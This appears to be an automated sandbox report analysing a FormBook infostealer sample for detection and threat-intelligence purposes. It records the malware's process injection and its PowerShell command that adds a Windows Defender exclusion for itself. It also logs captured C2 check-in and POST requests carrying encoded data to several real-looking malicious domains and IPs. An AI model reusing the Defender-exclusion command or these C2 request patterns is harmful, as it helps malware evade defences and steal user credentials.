Windows Analysis Report
QmBbqpEHu0.exe

Overview

General Information

Sample name: QmBbqpEHu0.exe (renamed because the original name is a hash value)
Original sample name: 80639535a88aa7662bb05425e5c1c3520c7642da20a0feaed308fec754661e89.exe
Analysis ID: 1587945
MD5: eb7415c6ed5d31b69c535afeed1ad3ac
SHA1: 11c7e7e4388044514f499bf63af99c6aebe14e13
SHA256: 80639535a88aa7662bb05425e5c1c3520c7642da20a0feaed308fec754661e89
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • QmBbqpEHu0.exe (PID: 7432 cmdline: "C:\Users\user\Desktop\QmBbqpEHu0.exe" MD5: EB7415C6ED5D31B69C535AFEED1AD3AC)
    • powershell.exe (PID: 7892 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QmBbqpEHu0.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8136 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • QmBbqpEHu0.exe (PID: 7900 cmdline: "C:\Users\user\Desktop\QmBbqpEHu0.exe" MD5: EB7415C6ED5D31B69C535AFEED1AD3AC)
      • cqvjCApYGBKzop.exe (PID: 4888 cmdline: "C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • finger.exe (PID: 2892 cmdline: "C:\Windows\SysWOW64\finger.exe" MD5: C586D06BF5D5B3E6E9E3289F6AA8225E)
          • cqvjCApYGBKzop.exe (PID: 5780 cmdline: "C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7344 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author
00000004.00000002.2286467492.00000000012E0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000A.00000002.3587418424.0000000000F50000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000A.00000002.3587551333.00000000030E0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000009.00000002.3587562902.00000000045B0000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
Source | Rule | Description | Author
4.2.QmBbqpEHu0.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
4.2.QmBbqpEHu0.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QmBbqpEHu0.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QmBbqpEHu0.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QmBbqpEHu0.exe", ParentImage: C:\Users\user\Desktop\QmBbqpEHu0.exe, ParentProcessId: 7432, ParentProcessName: QmBbqpEHu0.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QmBbqpEHu0.exe", ProcessId: 7892, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QmBbqpEHu0.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QmBbqpEHu0.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QmBbqpEHu0.exe", ParentImage: C:\Users\user\Desktop\QmBbqpEHu0.exe, ParentProcessId: 7432, ParentProcessName: QmBbqpEHu0.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QmBbqpEHu0.exe", ProcessId: 7892, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T19:46:21.171227+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49843 | 172.247.112.164 | 80 | TCP
2025-01-10T19:46:49.387880+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50012 | 13.248.169.48 | 80 | TCP
2025-01-10T19:47:23.511477+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50016 | 156.253.8.115 | 80 | TCP
2025-01-10T19:47:36.864133+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50020 | 37.97.254.27 | 80 | TCP
2025-01-10T19:47:51.047350+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50024 | 199.193.6.134 | 80 | TCP
2025-01-10T19:48:18.386830+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50028 | 124.6.61.130 | 80 | TCP


AV Detection

Source: QmBbqpEHu0.exe; Avira: detected
Source: QmBbqpEHu0.exe; ReversingLabs: Detection: 78%
Source: QmBbqpEHu0.exe; Virustotal: Detection: 63%
Source: Yara match; File source: 4.2.QmBbqpEHu0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.QmBbqpEHu0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000004.00000002.2286467492.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.3587418424.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.3587551333.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.3587562902.00000000045B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2286547549.0000000002840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: QmBbqpEHu0.exe; Joe Sandbox ML: detected
Source: QmBbqpEHu0.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: QmBbqpEHu0.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: HszP.pdbSHA256 source: QmBbqpEHu0.exe
Source: Binary string: finger.pdb source: QmBbqpEHu0.exe, 00000004.00000002.2285714883.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, cqvjCApYGBKzop.exe, 00000009.00000002.3587143350.000000000167E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: cqvjCApYGBKzop.exe, 00000009.00000002.3586427956.000000000097E000.00000002.00000001.01000000.0000000D.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000000.2358690186.000000000097E000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: HszP.pdb source: QmBbqpEHu0.exe
Source: Binary string: wntdll.pdbUGP source: QmBbqpEHu0.exe, 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000A.00000003.2285870357.0000000003150000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000A.00000003.2289344794.0000000003304000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: QmBbqpEHu0.exe, QmBbqpEHu0.exe, 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 0000000A.00000003.2285870357.0000000003150000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000A.00000003.2289344794.0000000003304000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: finger.pdbGCTL source: QmBbqpEHu0.exe, 00000004.00000002.2285714883.00000000009B8000.00000004.00000020.00020000.00000000.sdmp, cqvjCApYGBKzop.exe, 00000009.00000002.3587143350.000000000167E000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\finger.exe; Code function: 10_2_009BC9E0 FindFirstFileW,FindNextFileW,FindClose, 10_2_009BC9E0
Source: C:\Windows\SysWOW64\finger.exe; Code function: 4x nop then xor eax, eax 10_2_009A9E40
Source: C:\Windows\SysWOW64\finger.exe; Code function: 4x nop then mov ebx, 00000004h 10_2_032E04E8

Networking

Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49843 -> 172.247.112.164:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50012 -> 13.248.169.48:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50016 -> 156.253.8.115:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50024 -> 199.193.6.134:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50028 -> 124.6.61.130:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50020 -> 37.97.254.27:80
Source: Joe Sandbox View; IP Address: 13.248.169.48
Source: Joe Sandbox View; IP Address: 37.97.254.27
Source: Joe Sandbox View; ASN Name: AMAZON-02US
Source: Joe Sandbox View; ASN Name: TRANSIP-ASAmsterdamtheNetherlandsNL
Source: Joe Sandbox View; ASN Name: CNSERVERSUS
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; HTTP traffic detected:
    GET /tvkp/?EzZ=KBC+qdhE4CeEPBlRbbr/xAo9xQXJnANs+ntD2JrTvmvKK8JoxnFP1tf4O24DvVFUTK8itIRNWKwGZ9ngU4oiptFTC0rH1QaQq1CS+53i55AcWe9W8nwBWKs=&BjRxb=8r70fhQxdN4lRB HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en
    Host: www.jgkgf.club
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected:
    GET /09b7/?EzZ=wTjYKy4Z1nhyNUYrgXWsKJYXRpEsDt53124S1AstIAPOGsN31c9TK1Z0TGDrPCbSlF/hfKeGaCXGdC0XkMxI0HZmVwdipOTzBPLQAeRKmoWWrOKaVcJIZso=&BjRxb=8r70fhQxdN4lRB HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en
    Host: www.hsa.world
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected:
    GET /6t0f/?EzZ=MY8WJ01352TVXzFsNodd1NxUli1E4sLIDPBPQPgfoKZiJVfQ3vqQHTL/6etRwfvFnZBRJEUa5B9wCMX79XLhBfQQAkU843AvbtgeEKbWrrYxtYrhlbwkADc=&BjRxb=8r70fhQxdN4lRB HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en
    Host: www.sssvip2.shop
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected:
    GET /7ujc/?EzZ=WvCg6J2jHD6L/TcyvzGm/cLTtunIwZsLDJOR2qctLrwbpbWmV0+8HmEyzKPQy50wJfwN5AO63TK9GRaTVCmcnK6BZOflUZJxlriydXV/Hhy/YqFf922rQpM=&BjRxb=8r70fhQxdN4lRB HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en
    Host: www.dutchdubliners.online
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected:
    GET /rdvg/?EzZ=TV3m+ZuR+MuvljvWunhewpdSMahlra0ppdriKzCX4142lV8I6FTOceHwOQEpd9UFqQTrUY1AGfMzy32q1OrbtcsJ52Sl7Z/04EVens9SqotHLWuAZYLLbuM=&BjRxb=8r70fhQxdN4lRB HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en
    Host: www.allstary.top
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Source: global traffic; HTTP traffic detected:
    GET /hmf8/?EzZ=pGw88cWx9XO22N8aqmdn8hAka7cZrcLUASSKDY6tOoqXrK9mACfM7RDKG8CJ0l3LEEEwdB4zk4PscTS/XwYetP3Hehsylu7Pqbem6CoT0ShzPMo+4xwLrgQ=&BjRxb=8r70fhQxdN4lRB HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en
    Host: www.comect.online
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Source: global traffic; DNS traffic detected: DNS query: www.jgkgf.club
Source: global traffic; DNS traffic detected: DNS query: www.hsa.world
Source: global traffic; DNS traffic detected: DNS query: www.sssvip2.shop
Source: global traffic; DNS traffic detected: DNS query: www.dutchdubliners.online
Source: global traffic; DNS traffic detected: DNS query: www.allstary.top
Source: global traffic; DNS traffic detected: DNS query: www.16v9tiu00r.ink
Source: global traffic; DNS traffic detected: DNS query: www.comect.online
Source: unknown; HTTP traffic detected:
    POST /09b7/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en
    Host: www.hsa.world
    Origin: http://www.hsa.world
    Content-Length: 200
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: no-cache
    Connection: close
    Referer: http://www.hsa.world/09b7/
    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
    Data Ascii: EzZ=9RL4JHol/lViFEYahXKBJqURT6JRE9VPyDA3my93ED/YELl465MCH29jWWfFZxHdvDvqXdL8QkOlXC8+4JJuqF5ncw9esKWQLqr0cvljro6fjbiAYNBjMIWPvDhMa7S0f7gbEonnIYSYV2lTBzbyU3vX1tTbNSObSO2yi4LcsrGgSnzXpvE2OYAT1xiLodIXWw==
Source: global traffic; HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Fri, 10 Jan 2025 18:47:42 GMT
    Server: Apache
    Content-Length: 389
    Connection: close
    Content-Type: text/html
    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic; HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Fri, 10 Jan 2025 18:47:45 GMT
    Server: Apache
    Content-Length: 389
    Connection: close
    Content-Type: text/html
    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic; HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Fri, 10 Jan 2025 18:47:48 GMT
    Server: Apache
    Content-Length: 389
    Connection: close
    Content-Type: text/html
    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic; HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Fri, 10 Jan 2025 18:47:50 GMT
    Server: Apache
    Content-Length: 389
    Connection: close
    Content-Type: text/html; charset=utf-8
    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: QmBbqpEHu0.exe, 00000000.00000002.3592498546.0000000002941000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.carterandcone.coml
Source: cqvjCApYGBKzop.exe, 0000000B.00000002.3587260572.000000000146C000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: http://www.comect.online
Source: cqvjCApYGBKzop.exe, 0000000B.00000002.3587260572.000000000146C000.00000040.80000000.00040000.00000000.sdmp; String found in binary or memory: http://www.comect.online/hmf8/
Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com
Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers
Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/?
Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers8
Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designers?
Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fontbureau.com/designersG
Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.fonts.com
Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.goodfont.co.kr
Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.sajatypeworks.com
Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.sakkal.com
Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.sandoll.co.kr
Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.tiro.com
Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.typography.netD
Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.urwpp.deDPlease
Source: QmBbqpEHu0.exe, 00000000.00000002.3610183471.0000000006CE2000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.zhongyicts.com.cn
Source: finger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: finger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: finger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: finger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: finger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: finger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: finger.exe, 0000000A.00000003.2498992786.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: finger.exe, 0000000A.00000002.3590326846.0000000006250000.00000004.00000800.00020000.00000000.sdmp, finger.exe, 0000000A.00000002.3588802979.000000000437A000.00000004.10000000.00040000.00000000.sdmp, cqvjCApYGBKzop.exe, 0000000B.00000002.3588155767.0000000003B2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Source
                Source: finger.exe, 0000000A.00000002.3586685335.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: finger.exe, 0000000A.00000002.3586685335.0000000000E5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: finger.exe, 0000000A.00000002.3586685335.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: finger.exe, 0000000A.00000002.3586685335.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: finger.exe, 0000000A.00000002.3586685335.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: finger.exe, 0000000A.00000002.3586685335.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: finger.exe, 0000000A.00000003.2474010966.0000000007C71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
